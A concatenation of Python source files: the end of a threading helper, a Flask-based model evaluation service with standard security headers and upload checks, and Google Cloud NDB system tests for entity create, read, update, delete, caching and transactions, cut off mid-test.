def __init__(self, target, args=(), kw={}, default=None):
threading.Thread.__init__(self)
self._target = target
self._args = args
self._kwargs = kw
self.result = default
self.exc_info = None
def run(self):
try:
self.result = self._target(*self._args, **self._kwargs)
except:
self.exc_info = sys.exc_info()
finally:
del self._target, self._args, self._kwargs
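# A minimal usage sketch (not part of the original library): it exercises Event with a
# memoized, time-limited handler and shows the (flag, result, handler) tuples described
# in the class docstring. The handler name and the sample values are illustrative only.
if __name__ == '__main__':
    ev = Event(threads=0)               # synchronous execution in the main thread

    def square(x):
        return x * x

    ev += (square, True, 1.0)           # register with memoize=True, timeout=1.0s
    print(ev(7))                        # -> ((True, 49, <function square ...>),)
    print(ev(7))                        # second call is served from the memoize cache
    ev -= square                        # unregister the handler
    print(ev(7))                        # -> None (no handlers left)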
|
main.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Evaluate Service of the service."""
import logging
import os
import glob
import multiprocessing
import time
import shutil
import datetime
import traceback
import argparse
from flask import abort, Flask, request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_restful import Resource, Api
try:
from werkzeug import secure_filename
except Exception:
from werkzeug.utils import secure_filename
from evaluate_service import security
from evaluate_service.class_factory import ClassFactory
from .hardwares import Davinci
from .run_flask import run_flask, get_white_list, get_request_frequency_limit
app = Flask(__name__)
app.config["MAX_CONTENT_LENGTH"] = 2048 * 1024 * 1024 # 2GB
api = Api(app)
@app.after_request
def after_request(response):
"""Add custom headers for Security reasons."""
ContentSecurityPolicy = ''
ContentSecurityPolicy += "default-src 'self'; "
ContentSecurityPolicy += "script-src 'self' 'unsafe-inline'; "
ContentSecurityPolicy += "style-src 'self' 'unsafe-inline'; "
ContentSecurityPolicy += "img-src 'self' data:; "
ContentSecurityPolicy += "connect-src 'self';"
response.headers.add('Content-Security-Policy', ContentSecurityPolicy)
response.headers.add('X-Content-Type-Options', 'nosniff')
response.headers.add('Strict-Transport-Security', 'max-age=31536000; includeSubDomains')
response.headers.add('X-Frame-Options', 'deny')
response.headers.add('Access-Control-Allow-Methods', 'POST')
response.headers.add('X-XSS-Protection', '1; mode=block')
response.headers.add('Cache-Control', 'no-cache, no-store, must-revalidate')
response.headers.add('Pragma', 'no-cache')
response.headers.add('Expires', '0')
response.headers.add('Connection', 'close')
return response
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["100/minute"]
)
@app.before_request
def limit_remote_addr():
"""Set limit remote address."""
client_ip = str(request.remote_addr)
white_list = get_white_list()
if Evaluate.security_mode and white_list is not None and client_ip not in white_list:
abort(403)
class Evaluate(Resource):
"""Evaluate Service for service."""
security_mode = False
decorators = [limiter.limit(get_request_frequency_limit, exempt_when=lambda: not Evaluate.security_mode)]
def __init__(self):
self.result = {"latency": "9999", "out_data": [], "status": "sucess", "timestamp": "", "error_message": ""}
@classmethod
def _add_params(cls, work_path, security_mode, optional_params):
cls.current_path = work_path
cls.security_mode = security_mode
cls.optional_params = optional_params
def options(self):
"""Return options."""
return {"message": "The method is not allowed for the requested URL."}, 405
def post(self):
"""Interface to response to the post request of the client."""
try:
self.parse_paras()
self.upload_files()
self.hardware_instance = ClassFactory.get_cls(self.hardware)(self.optional_params)
except Exception as e:
self.result["status"] = "Params error."
self.result["error_message"] = str(e)
logging.error("[ERROR] Params error!")
            logging.debug(traceback.format_exc())
return self.result, 400
if self.reuse_model:
logging.warning("Reuse the model, no need to convert the model.")
else:
try:
self.hardware_instance.convert_model(backend=self.backend, model=self.model, weight=self.weight,
save_dir=self.share_dir, input_shape=self.input_shape,
out_nodes=self.out_nodes, precision=self.precision)
except Exception as e:
self.result["status"] = "Model convert failed."
self.result["error_message"] = str(e)
logging.error("[ERROR] Model convert failed!")
                logging.debug(traceback.format_exc())
return self.result, 400
try:
latency_sum = 0
for repeat in range(self.repeat_times):
                is_last = (repeat == self.repeat_times - 1)
latency, output = self.hardware_instance.inference(converted_model=self.share_dir,
input_data=self.input_data,
is_last=is_last,
cal_metric=self.cal_metric)
latency_sum += float(latency)
self.result["latency"] = latency_sum / self.repeat_times
self.result["out_data"] = output
except Exception as e:
self.result["status"] = "Inference failed."
self.result["error_message"] = str(e)
logging.error("[ERROR] Inference failed! ")
logging.debug(traceback.print_exc())
return self.result, 400
return self.result, 200
def parse_paras(self):
"""Parse the parameters in the request from the client."""
self.backend = request.form["backend"]
self.hardware = request.form["hardware"]
self.reuse_model = bool(request.form["reuse_model"].upper() == "TRUE")
self.cal_metric = bool(request.form["cal_metric"].upper() == "TRUE")
self.job_id = request.form["job_id"]
self.input_shape = request.form.get("input_shape", type=str, default="")
self.out_nodes = request.form.get("out_nodes", type=str, default="")
self.repeat_times = int(request.form.get("repeat_times"))
self.precision = request.form.get("precision", type=str, default="FP32")
if self.security_mode:
security.args.check_backend(self.backend)
security.args.check_hardware(self.hardware)
security.args.check_job_id(self.job_id)
security.args.check_input_shape(self.input_shape)
security.args.check_out_nodes(self.out_nodes)
security.args.check_repeat_times(self.repeat_times)
security.args.check_precision(self.precision)
def upload_files(self):
"""Upload the files from the client to the service."""
self.now_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')
self.result["timestamp"] = self.now_time
logging.warning("The timestamp is {}.".format(self.now_time))
self.upload_file_path = os.path.join(self.current_path, "out", self.now_time)
self.share_dir = os.path.join(self.current_path, "out", self.job_id)
os.makedirs(self.upload_file_path)
os.makedirs(self.share_dir)
patterns = [".pkl", ".pth", ".pt", ".pb", ".ckpt", ".air", '.om',
".onnx", ".caffemodel", ".pbtxt", ".prototxt"]
model_file = request.files.get("model_file")
if model_file is not None:
self.model = self.upload_file_path + "/" + secure_filename(model_file.filename)
if os.path.splitext(self.model)[1] not in patterns:
raise ValueError(f'{model_file.filename} file type is not supported.')
model_file.save(self.model)
data_file = request.files.get("data_file")
if data_file is not None:
self.input_data = self.upload_file_path + "/" + secure_filename(data_file.filename)
if not os.path.basename(self.input_data) == 'input.bin':
raise ValueError(f'data {data_file.filename} file is not supported.')
data_file.save(self.input_data)
weight_file = request.files.get("weight_file")
if weight_file is not None:
self.weight = self.upload_file_path + "/" + secure_filename(weight_file.filename)
if os.path.splitext(self.weight)[1] not in patterns:
raise ValueError(f'{weight_file.filename} file type is not supported.')
weight_file.save(self.weight)
else:
self.weight = ""
logging.warning("upload file sucess!")
def _clean_data_path(clean_interval, work_path):
while True:
_clean_time = time.time() - clean_interval
folder_pattern = "{}/out/*".format(work_path)
folders = glob.glob(folder_pattern)
for folder in folders:
if os.path.isdir(folder) and os.path.getctime(folder) < _clean_time:
logging.warning("remove old folder: {}".format(folder))
try:
shutil.rmtree(folder)
except Exception:
logging.warning("failed to remove {}".format(folder))
time.sleep(3600)
def _parse_args():
parser = argparse.ArgumentParser(description="Evaluate service")
parser.add_argument("-i", "--host_ip", type=str, required=True, help="the ip of the evaluate service machine")
parser.add_argument("-p", "--port", type=int, required=False, default=8888, help="the listening port")
parser.add_argument("-w", "--work_path", type=str, required=True, help="the work dir to save the file")
parser.add_argument("-t", "--davinci_environment_type", type=str, required=False, default="ATLAS300",
help="the type the davinci hardwares")
parser.add_argument("-c", "--clean_interval", type=int, required=False, default=1 * 6 * 3600,
help="the time interval to clean the temp folder")
parser.add_argument("-u", "--ddk_user_name", type=str, required=False, default="user",
help="the user to acess ATLAS200200 DK")
parser.add_argument("-atlas_host_ip", "--atlas_host_ip", type=str, required=False, default=None,
help="the ip of ATLAS200200 DK")
parser.add_argument("-s", "--security_mode", action='store_true',
help="enable safe mode")
args = parser.parse_args()
return args
def run():
"""Run the evaluate service."""
args = _parse_args()
ip_address = args.host_ip
listen_port = args.port
clean_interval = args.clean_interval
work_path = args.work_path
security_mode = args.security_mode
if security_mode:
os.umask(0o077)
optional_params = {"davinci_environment_type": args.davinci_environment_type,
"ddk_user_name": args.ddk_user_name,
"atlas_host_ip": args.atlas_host_ip
}
p = multiprocessing.Process(target=_clean_data_path, args=(clean_interval, work_path), daemon=True)
p.start()
Evaluate._add_params(work_path, args.security_mode, optional_params)
api.add_resource(Evaluate, '/')
run_flask(app, host=ip_address, port=listen_port, security_mode=security_mode)
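# Hedged client-side sketch (not part of the original service and never called by it): it
# shows the multipart/form-data layout that parse_paras() and upload_files() above expect.
# The URL, file paths, field values and the third-party `requests` dependency are
# assumptions for illustration only.
def _example_client_request():
    import requests  # assumed to be available on the client side
    data = {
        "backend": "tensorflow",            # parsed by parse_paras()
        "hardware": "Davinci",
        "reuse_model": "False",
        "cal_metric": "False",
        "job_id": "job_0001",
        "input_shape": "input:1,224,224,3",
        "out_nodes": "output:0",
        "repeat_times": "10",
        "precision": "FP32",
    }
    files = {
        "model_file": open("model.pb", "rb"),   # placeholder path
        "data_file": open("input.bin", "rb"),   # must be named input.bin (see upload_files)
    }
    # weight_file is optional; if omitted, the service falls back to an empty weight path.
    return requests.post("http://127.0.0.1:8888/", data=data, files=files, timeout=600)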
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import random
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert redis_context.global_cache.redis.get(cache_key) is not None
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entities_in_parallel_nested(ds_entity):
"""Regression test for #357.
https://github.com/googleapis/python-ndb/issues/357
"""
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
entity3_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity3_id, foo=66, bar="route")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
key3 = ndb.Key(KIND, entity3_id)
@ndb.tasklet
def get_two_entities():
entity1, (entity2, entity3) = yield (
key1.get_async(),
[key2.get_async(), key3.get_async()],
)
raise ndb.Return(entity1, entity2, entity3)
entity1, entity2, entity3 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
assert isinstance(entity3, SomeKind)
assert entity3.foo == 66
assert entity3.bar == "route"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_repeated_local_structured_property(dispose_of, ds_client):
class Dog(ndb.Model):
name = ndb.StringProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.dogs == dogs
def test_get_by_id_with_compressed_repeated_local_structured_property(
client_context, dispose_of, ds_client
):
class Dog(ndb.Model):
name = ndb.TextProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
with client_context.new(legacy_data=True).use():
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
house_id = key.id()
dispose_of(key._key)
retrieved = House.get_by_id(house_id)
assert retrieved.dogs == dogs
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, redis_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert redis_context.global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert redis_context.global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert redis_context.global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
assert key.get().foo == 42
assert redis_context.global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert redis_context.global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert redis_context.global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
